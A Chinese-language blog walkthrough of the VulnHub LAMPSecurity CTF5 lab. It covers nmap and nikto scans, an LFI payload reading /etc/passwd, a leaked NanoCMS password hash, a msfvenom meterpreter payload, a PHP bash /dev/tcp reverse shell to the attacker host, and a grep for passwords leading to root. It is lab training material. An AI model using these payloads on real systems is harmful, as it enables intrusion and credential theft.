<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      VulnHub_02_LAMPSECURITY: CTF5 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ghostasky</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        VulnHub_02_LAMPSECURITY: CTF5
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2022-02-17
      </span>

                                                                        <span class="post-pubtime"> 本文共1.7k字 </span>

                                                                        <span class="post-pubtime">
        大约需要16min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/VulnHub/" title="VulnHub">
            <b>#</b> VulnHub
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>download:<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/lampsecurity-ctf5,84/">https://www.vulnhub.com/entry/lampsecurity-ctf5,84/</a></p>
<p>扫描之后发现是：<code>http://192.168.188.131</code></p>
<p><code>nmap -sV &lt; 要扫描的目标ip地址&gt;</code>*</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">┌──(root💀kali)-[/home/kali]</span><br><span class="line">└─<span class="comment"># nmap -sV 192.168.188.131                                                                                   130 ⨯</span></span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 01:26 EST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.188.131</span><br><span class="line">Host is up (0.0059s latency).</span><br><span class="line">Not shown: 990 closed ports</span><br><span class="line">PORT     STATE SERVICE     VERSION</span><br><span class="line">22/tcp   open  ssh         OpenSSH 4.7 (protocol 2.0)</span><br><span class="line">25/tcp   open  smtp        Sendmail 8.14.1/8.14.1</span><br><span class="line">80/tcp   open  http        Apache httpd 2.2.6 ((Fedora))</span><br><span class="line">110/tcp  open  pop3        ipop3d 2006k.101</span><br><span class="line">111/tcp  open  rpcbind     2-4 (RPC <span class="comment">#100000)</span></span><br><span class="line">139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)</span><br><span class="line">143/tcp  open  imap        University of Washington IMAP imapd 2006k.396 (time zone: -0500)</span><br><span class="line">445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)</span><br><span class="line">901/tcp  open  http        Samba SWAT administration server</span><br><span class="line">3306/tcp open  mysql       MySQL 5.0.45</span><br><span class="line">MAC Address: 00:0C:29:44:6B:32 (VMware)</span><br><span class="line">Service Info: Hosts: localhost.localdomain, 192.168.188.131; OS: Unix</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 11.79 seconds</span><br><span class="line">                                                                 </span><br></pre></td></tr></table></figure>

<p>使用nikto扫下：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">└─<span class="comment"># nikto -h 192.168.188.131</span></span><br><span class="line">- Nikto v2.1.6</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ Target IP:          192.168.188.131</span><br><span class="line">+ Target Hostname:    192.168.188.131</span><br><span class="line">+ Target Port:        80</span><br><span class="line">+ Start Time:         2022-02-16 01:29:54 (GMT-5)</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ Server: Apache/2.2.6 (Fedora)</span><br><span class="line">+ Retrieved x-powered-by header: PHP/5.2.4</span><br><span class="line">+ The anti-clickjacking X-Frame-Options header is not present.</span><br><span class="line">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</span><br><span class="line">+ The X-Content-Type-Options header is not <span class="built_in">set</span>. This could allow the user agent to render the content of the site <span class="keyword">in</span> a different fashion to the MIME <span class="built_in">type</span></span><br><span class="line">+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL <span class="keyword">for</span> the 2.x branch.</span><br><span class="line">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE </span><br><span class="line">+ Web Server returns a valid response with junk HTTP methods, this may cause <span class="literal">false</span> positives.</span><br><span class="line">+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST</span><br><span class="line">+ /index.php: PHP include error may indicate <span class="built_in">local</span> or remote file inclusion is possible.</span><br><span class="line">^[[B^[[B^[[B+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.</span><br><span class="line">+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.</span><br><span class="line">+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.</span><br><span class="line">+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is <span class="keyword">for</span> managing MySQL databases, and should be protected or limited to authorized hosts.</span><br><span class="line">+ Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Mon Aug 20 22:59:12 2029</span><br><span class="line">+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is <span class="keyword">for</span> managing MySQL databases, and should be protected or limited to authorized hosts.</span><br><span class="line">+ Cookie SQMSESSID created without the httponly flag</span><br><span class="line">+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found</span><br><span class="line">+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found</span><br><span class="line">+ /info.php: Output from the phpinfo() <span class="keyword">function</span> was found.</span><br><span class="line">+ OSVDB-3233: /info.php: PHP is installed, and a <span class="built_in">test</span> script <span class="built_in">which</span> runs phpinfo() was found. This gives a lot of system information.</span><br><span class="line">+ OSVDB-3268: /icons/: Directory indexing found.</span><br><span class="line">+ OSVDB-3233: /icons/README: Apache default file found.</span><br><span class="line">+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake<span class="string">&#x27;s list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/</span></span><br><span class="line"><span class="string">+ /phpmyadmin/: phpMyAdmin directory found</span></span><br><span class="line"><span class="string">+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.</span></span><br><span class="line"><span class="string">+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.</span></span><br><span class="line"><span class="string">+ 8724 requests: 0 error(s) and 26 item(s) reported on remote host</span></span><br><span class="line"><span class="string">+ End Time:           2022-02-16 01:30:19 (GMT-5) (25 seconds)</span></span><br><span class="line"><span class="string">---------------------------------------------------------------------------</span></span><br><span class="line"><span class="string">+ 1 host(s) tested</span></span><br></pre></td></tr></table></figure>

<p>可以看到有LFI&#x2F;RFI</p>
<p><code>http://192.168.188.131//index.php?page=../../../../../../../../../etc/passwd%00</code></p>
<p><code>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin polkituser:x:87:87:PolicyKit:/:/sbin/nologin avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash andy:x:502:502:Andrew Carp:/home/andy:/bin/bash loren:x:503:503:Loren Felt:/home/loren:/bin/bash amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash </code></p>
<p>搜下底部关于nanocms的洞，：<a target="_blank" rel="noopener" href="https://vulners.com/openvas/OPENVAS:100141">https://vulners.com/openvas/OPENVAS:100141</a></p>
<p>有个是密码散列信息泄露，允许不受限制地访问：&#x2F;data&#x2F;pagesdata.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:12:&#123;s:8:&quot;homepage&quot;;s:1:&quot;1&quot;;s:10:&quot;links_cats&quot;;a:4:&#123;s:7:&quot;sidebar&quot;;a:2:&#123;i:0;i:1;i:1;i:4;&#125;s:11:&quot;other-pages&quot;;a:0:&#123;&#125;s:14:&quot;top-navigation&quot;;a:2:&#123;i:0;s:1:&quot;1&quot;;i:1;s:1:&quot;4&quot;;&#125;s:12:&quot;Footer-Right&quot;;a:2:&#123;i:0;s:1:&quot;1&quot;;i:1;s:1:&quot;4&quot;;&#125;&#125;s:5:&quot;slugs&quot;;a:2:&#123;i:1;s:4:&quot;home&quot;;i:4;s:7:&quot;contact&quot;;&#125;s:6:&quot;titles&quot;;a:2:&#123;i:1;s:4:&quot;Home&quot;;i:4;s:7:&quot;Contact&quot;;&#125;s:10:&quot;slug_count&quot;;i:11;s:8:&quot;settings&quot;;a:3:&#123;s:19:&quot;index-last-modified&quot;;i:1234513760;s:18:&quot;def-template-areas&quot;;a:4:&#123;i:0;s:12:&quot;website name&quot;;i:2;s:14:&quot;website slogan&quot;;i:3;s:16:&quot;below navigation&quot;;i:4;s:16:&quot;copyright notice&quot;;&#125;s:18:&quot;def-template-links&quot;;a:2:&#123;i:0;s:14:&quot;top-navigation&quot;;i:1;s:12:&quot;Footer-Right&quot;;&#125;&#125;s:13:&quot;active-tweaks&quot;;a:2:&#123;i:0;s:7:&quot;deutsch&quot;;i:1;s:19:&quot;language-pack-tweak&quot;;&#125;s:11:&quot;lang-select&quot;;s:7:&quot;english&quot;;s:6:&quot;seourl&quot;;s:1:&quot;0&quot;;s:8:&quot;username&quot;;s:5:&quot;admin&quot;;s:8:&quot;password&quot;;s:32:&quot;9d2f75377ac0ab991d40c91fd27e52fd&quot;;s:7:&quot;version&quot;;s:4:&quot;v_4f&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>得到admin的密码的hash解密为shannon</p>
<p>登进去后直接newpage，使用msfvenom反弹shell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.188.129 lport=4444 -f raw</span><br></pre></td></tr></table></figure>

<p><img src="/2022/02/17/VulnHub02/image-20220216211315347.png" alt="image-20220216211315347"></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msf &gt; use exploit/multi/handler</span><br><span class="line">msf exploit(handler) &gt; <span class="built_in">set</span> payload php/meterpreter/reverse_tcp</span><br><span class="line">msf exploit(handler) &gt; <span class="built_in">set</span> lhost 192.168.188.129</span><br><span class="line">msf exploit(handler) &gt; <span class="built_in">set</span> lport 4444</span><br><span class="line">msf exploit(handler) &gt; run</span><br></pre></td></tr></table></figure>

<p>或者直接：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">system(&quot;bash -i &gt;&amp; /dev/tcp/192.168.188.129/4444 0&gt;&amp;1&quot;);</span><br><span class="line">?&gt;</span><br><span class="line">--------</span><br><span class="line">nc -lp 4444</span><br></pre></td></tr></table></figure>

<p>通过以下命令在home下找root密码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep -R -i password /home/* 2&gt; /dev/null</span><br></pre></td></tr></table></figure>

<p><img src="/2022/02/17/VulnHub02/image-20220216214354852.png" alt="image-20220216214354852"></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">bash-3.2$ su</span><br><span class="line">standard <span class="keyword">in</span> must be a tty</span><br><span class="line">bash-3.2$ python -c <span class="string">&#x27;import pty;pty.spawn(&quot;/bin/sh&quot;)&#x27;</span></span><br><span class="line">sh-3.2$ id</span><br><span class="line">id</span><br><span class="line">uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0</span><br><span class="line">sh-3.2$ su</span><br><span class="line">su</span><br><span class="line">Password: 50<span class="variable">$cent</span></span><br><span class="line"></span><br><span class="line">[root@localhost public_html]<span class="comment"># whoami</span></span><br><span class="line">whoami</span><br><span class="line">root</span><br><span class="line">[root@localhost public_html]<span class="comment"># </span></span><br></pre></td></tr></table></figure>

<p>进去直接su的时候提示：<code>standard in must be a tty</code>，直接：<code>python -c &#39;import pty;pty.spawn(&quot;/bin/sh&quot;)&#39;</code></p>

                                                                    </div>
                                                                    
                                                                        <div class="prev-or-next">
                                                                            <div class="post-foot-next">
                                                                                
                                                                                    <a href="/2022/02/16/VulnHub01/" target="_self">
                                                                                        <i class="iconfont icon-chevronleft"></i>
                                                                                        <span>Prev</span>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                            <div class="post-attach">
                                                                                <!-- <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2022-02-17
            </span> -->

                                                                                
                                                                                            <span class="post-categories">
          <!-- <i class="iconfont icon-bookmark" title="Categories"></i> -->
          
          <!-- <span class="span--category">
            <a href="/categories/Technology/" title="Technology">
              <b>#</b> Technology
            </a>
          </span> -->
                                                                                            
                                                                                                </span>
                                                                                                
                                                                                    <span class="post-tags">
          <!-- <i class="iconfont icon-tags" title="Tags"></i> -->
          
          <!-- <span class="span--tag">
            <a href="/tags/VulnHub/" title="VulnHub">
              <b>#</b> VulnHub
            </a>
          </span> -->
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            </div>
                                                                            <div class="post-foot-prev">
                                                                                
                                                                                    <a href="/2022/02/19/VulnHub03/" target="_self">
                                                                                        <span>Next</span>
                                                                                        <i class="iconfont icon-chevronright"></i>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                        </div>
                                                                        
                                                                </div>
                                                                

                                                                    
                                                                        <div class="comments-container">
                                                                            







                                                                        </div>
                                                                        
                                                            </div>
                                                            
        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ghostasky">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ghostasky">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ghostasky">怕什么真理无穷，进一寸有进一寸的欢喜。</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + VulnHub_02_LAMPSECURITY%3A%20CTF5 + '&url=' + https%3A%2F%2Fghostasky.github.io%2F2022%2F02%2F17%2FVulnHub02%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ghostasky.github.io/2022/02/17/VulnHub02/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
